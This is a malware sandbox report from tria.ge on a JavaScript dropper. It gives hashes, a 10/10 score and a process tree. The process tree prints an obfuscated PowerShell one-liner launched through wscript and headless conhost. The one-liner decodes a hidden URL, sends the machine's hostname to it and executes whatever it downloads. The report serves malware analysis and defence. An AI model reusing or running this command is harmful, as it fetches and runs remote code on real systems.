Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

ASXY2467_1631619.js

windows10-1703-x64

10

ASXY2467_1631619.js

windows7-x64

10

ASXY2467_1631619.js

windows10-2004-x64

10

Analysis

  • max time kernel
    1607s
  • max time network
    1610s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    18/05/2023, 18:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ASXY2467_1631619.js

  • Size

    717KB

  • MD5

    080ba689ee07945facc3aeaec15aecc3

  • SHA1

    a2a934c80bc69dfac8196e38f02218d757c1aa71

  • SHA256

    5d9bb00a311c684e56acf8e5fe280fdc9f81c68533c6b1878cdd9452b766c52a

  • SHA512

    bf6ab2eb400ba80599352c4379d45c740568e7174eb4a392cd23d5aba7922fc80a4e9fb4ac60d6b2ff9182b767aaaf7d8855167982bdc450a17da3aed6e35488

  • SSDEEP

    3072:eCEoVZA2T9JOg8rRFqQWF0W6ozJop+4WvbVaqvXnHHqxArb4mTXGO9bUo5qO4qQg:iDxD/Lc

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ASXY2467_1631619.js
    1⤵
      PID:1144
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $grt=$(hostname);@(8696,8708,8708,8704,8650,8639,8639,8706,8707,8714,8693,8693,8638,8708,8703,8704,8639,8706,8708,8638,8704,8696,8704,8655,8697,8653)|foreach{$wmisqt=$wmisqt+[char]($_-8592)};$lpkonf='l';new-alias trys cur$lpkonf;.$([char](6692-6587)+'ex')(trys -useb "$wmisqt$grt")
      1⤵
      • Process spawned unexpected child process
      PID:592

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads